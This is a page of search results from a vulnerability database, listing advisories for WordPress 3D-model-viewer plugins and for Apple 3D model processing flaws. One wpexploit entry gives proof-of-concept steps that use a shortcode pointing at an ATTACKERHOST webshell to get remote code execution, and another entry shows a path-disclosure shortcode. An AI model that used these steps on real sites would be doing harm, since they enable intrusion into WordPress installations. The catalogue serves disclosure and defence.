Lucene search
+L

89 matches found

Patchstack
Patchstack
added 2024/03/29 12:0 a.m.9 views

WordPress Spin 360 deg and 3D Model Viewer Plugin <= 1.2.7 is vulnerable to Cross Site Scripting (XSS)

Software Spin 360 deg and 3D Model Viewer Type Plugin Vulnerable versions = 1.2.7 Fixed in N/A OWASP Top 10 A3: Injection Classification Cross Site Scripting XSS CVE CVE-2024-30559 Patch priority Low CVSS severity Low 6.5 Developer Claim ownership PSID 26eafe92fc92 Credits LVT-tholv2k Required...

6.5CVSS6.6AI score0.0034EPSS
Exploits0References1Affected Software1
Prion
Prion
added 2024/01/10 10:15 p.m.25 views

Design/Logic Flaw

This issue was addressed by improving Face ID anti-spoofing models. This issue is fixed in iOS 17 and iPadOS 17. A 3D model constructed to look like the enrolled user may authenticate via Face ID...

1.9CVSS6.3AI score0.00174EPSS
Exploits0References1Affected Software2
Vulnrichment
Vulnrichment
added 2024/01/10 10:3 p.m.17 views

CVE-2023-41069

This issue was addressed by improving Face ID anti-spoofing models. This issue is fixed in iOS 17 and iPadOS 17. A 3D model constructed to look like the enrolled user may authenticate via Face ID...

6.1AI score0.00174EPSS
Exploits0References1
Cvelist
Cvelist
added 2024/01/10 10:3 p.m.26 views

CVE-2023-41069

This issue was addressed by improving Face ID anti-spoofing models. This issue is fixed in iOS 17 and iPadOS 17. A 3D model constructed to look like the enrolled user may authenticate via Face ID...

6AI score0.00174EPSS
Exploits0References1
CVE
CVE
added 2023/12/18 8:7 p.m.62 views

CVE-2023-4311

CVE-2023-4311 affects the Vrm 360 3D Model Viewer WordPress plugin (versions up to 1.2.1). The vulnerability is an arbitrary file upload due to insufficient checks in a plugin shortcode, enabling potential remote code execution. Public sources in the connected records describe PoCs and demonstrat...

8.8CVSS8.7AI score0.00985EPSS
Exploits2References1Affected Software1
wpexploit
wpexploit
added 2023/11/24 12:0 a.m.206 views

Vrm 360 3D Model Viewer <= 1.2.1 - Contributor+ Arbitrary File Upload Leading to RCE

Description The plugin is vulnerable to arbitrary file upload due to insufficient checks in a plugin shortcode. 1. Host a webserver with a shell named webshell.zip.php 2. As a contributor, add the shortcode: vrm360 canvasname=s1 modelurl=http://ATTACKERHOST/webshell.zip.php aspectratio=1.8...

8.8CVSS7.4AI score0.00985EPSS
Exploits2
Prion
Prion
added 2023/10/16 8:15 p.m.20 views

Path traversal

The Vrm 360 3D Model Viewer WordPress plugin through 1.2.1 exposes the full path of a file when putting in a non-existent file in a parameter of the shortcode...

5CVSS5.2AI score0.00545EPSS
Exploits2References1Affected Software1
CVE
CVE
added 2023/10/16 7:38 p.m.57 views

CVE-2023-5177

CVE-2023-5177 affects the Vrm 360 3D Model Viewer WordPress plugin (

5.3CVSS5.6AI score0.00545EPSS
Exploits2References1Affected Software1
Patchstack
Patchstack
added 2023/09/26 12:0 a.m.12 views

WordPress Vrm 360 3D Model Viewer Plugin <= 1.2.1 is vulnerable to Sensitive Data Exposure

Software Vrm 360 3D Model Viewer Type Plugin Vulnerable versions = 1.2.1 Fixed in N/A OWASP Top 10 A5: Security Misconfiguration Classification Sensitive Data Exposure CVE CVE-2023-5177 Patch priority Low CVSS severity Low 4.3 Developer Claim ownership PSID 41f6e6c8c32c Credits Jonatas Souza Vill...

5.3CVSS6.9AI score0.00545EPSS
Exploits2References3Affected Software1
WPVulnDB
WPVulnDB
added 2023/09/25 12:0 a.m.22 views

Vrm 360 3D Model Viewer <= 1.2.1 - Full Path Disclosure

Description The plugin exposes the full path of a file when putting in a non-existent file in a parameter of the shortcode. PoC 1. Create a page 2. Place the shortcode vrm360 canvasname=s1 modelurl=SACharacter.zip aspectratio=1.8 initialoffset=0.9 on the page SACharacter.zip should be a...

5.3CVSS5.3AI score0.00545EPSS
Exploits2
NVD
NVD
added 2023/07/27 1:15 a.m.20 views

CVE-2023-38421

The issue was addressed with improved checks. This issue is fixed in macOS Ventura 13.5, macOS Monterey 12.6.8. Processing a 3D model may result in disclosure of process memory...

5.5CVSS5.5AI score0.00312EPSS
Exploits0References2
OSV
OSV
added 2023/07/27 1:15 a.m.4 views

CVE-2023-38258

The issue was addressed with improved checks. This issue is fixed in macOS Ventura 13.5, macOS Monterey 12.6.8. Processing a 3D model may result in disclosure of process memory...

5.5CVSS7.1AI score0.0028EPSS
Exploits0References2
NVD
NVD
added 2023/07/27 1:15 a.m.23 views

CVE-2023-38258

The issue was addressed with improved checks. This issue is fixed in macOS Ventura 13.5, macOS Monterey 12.6.8. Processing a 3D model may result in disclosure of process memory...

5.5CVSS5.5AI score0.0028EPSS
Exploits0References2
Prion
Prion
added 2023/07/27 1:15 a.m.15 views

Design/Logic Flaw

The issue was addressed with improved checks. This issue is fixed in macOS Ventura 13.5, macOS Monterey 12.6.8. Processing a 3D model may result in disclosure of process memory...

1.9CVSS5.3AI score0.00312EPSS
Exploits0References2Affected Software1
Vulnrichment
Vulnrichment
added 2023/07/27 12:31 a.m.13 views

CVE-2023-38258

The issue was addressed with improved checks. This issue is fixed in macOS Ventura 13.5, macOS Monterey 12.6.8. Processing a 3D model may result in disclosure of process memory...

5.9AI score0.0028EPSS
Exploits0References2
Cvelist
Cvelist
added 2023/07/27 12:31 a.m.29 views

CVE-2023-38258

The issue was addressed with improved checks. This issue is fixed in macOS Ventura 13.5, macOS Monterey 12.6.8. Processing a 3D model may result in disclosure of process memory...

6.4AI score0.0028EPSS
Exploits0References2
CVE
CVE
added 2023/07/27 12:31 a.m.292 views

CVE-2023-38258

CVE-2023-38258 concerns macOS: processing a 3D model may disclose process memory. The issue was addressed with improved checks and is reported as fixed in macOS Ventura 13.5 and macOS Monterey 12.6.8. Affected components include the Model I/O subsystem responsible for 3D model handling, with memo...

5.5CVSS5.4AI score0.0028EPSS
Exploits0References2Affected Software1
Cvelist
Cvelist
added 2023/07/27 12:30 a.m.22 views

CVE-2023-38421

The issue was addressed with improved checks. This issue is fixed in macOS Ventura 13.5, macOS Monterey 12.6.8. Processing a 3D model may result in disclosure of process memory...

6.4AI score0.00312EPSS
Exploits0References2
Vulnrichment
Vulnrichment
added 2023/07/27 12:30 a.m.12 views

CVE-2023-38421

The issue was addressed with improved checks. This issue is fixed in macOS Ventura 13.5, macOS Monterey 12.6.8. Processing a 3D model may result in disclosure of process memory...

5.9AI score0.00312EPSS
Exploits0References2
NVD
NVD
added 2023/06/23 6:15 p.m.15 views

CVE-2023-32382

An out-of-bounds read was addressed with improved input validation. This issue is fixed in macOS Big Sur 11.7.7, macOS Monterey 12.6.6, macOS Ventura 13.4. Processing a 3D model may result in disclosure of process memory...

5.5CVSS4.6AI score0.00247EPSS
Exploits0References3
Rows per page
Query Builder